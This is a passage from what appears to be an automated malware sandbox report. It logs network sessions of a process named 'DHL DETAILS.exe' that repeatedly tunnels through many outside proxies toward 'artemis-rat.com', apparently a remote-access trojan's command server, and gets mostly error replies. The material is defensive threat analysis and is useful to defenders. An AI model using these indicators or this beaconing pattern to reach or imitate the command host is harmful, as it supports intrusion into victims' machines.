Mar 9, 2024 13:14:13.103811979 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
164	192.168.2.5	50375	110.12.211.140	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.970455885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.284569025 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
165	192.168.2.5	50582	104.17.16.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.977355003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.132623911 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
166	192.168.2.5	50384	46.17.63.166	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.979486942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.350884914 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
167	192.168.2.5	50418	149.102.130.120	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.982336998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.614348888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.473735094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.333461046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.833754063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
168	192.168.2.5	50594	45.12.31.140	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.983344078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.138139009 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
169	192.168.2.5	50595	104.22.14.48	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.983469963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.138453960 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
170	192.168.2.5	50559	51.81.186.179	58630	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.985320091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.473690987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.067467928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.239341021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724066019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224447012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
171	192.168.2.5	50600	104.16.224.33	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.985943079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.140842915 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
172	192.168.2.5	50431	82.113.157.122	31280	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.989892960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
173	192.168.2.5	50337	172.232.111.247	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.989892960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
174	192.168.2.5	50615	172.67.182.107	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.993132114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.147735119 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
175	192.168.2.5	50623	172.67.200.220	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.003760099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.158767939 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
176	192.168.2.5	49755	51.15.230.100	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.003861904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.004937887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036694050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.130048990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.425422907 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
177	192.168.2.5	50631	104.17.66.69	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.004401922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.159471035 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
178	192.168.2.5	50634	104.18.237.128	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.005177021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.160320997 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
179	192.168.2.5	50529	198.199.86.11	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.007589102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.098347902 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
180	192.168.2.5	50376	123.126.158.50	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.009244919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.335786104 CET	536	IN	HTTP/1.1 500 Internal Server Error Server: openresty Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 576 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 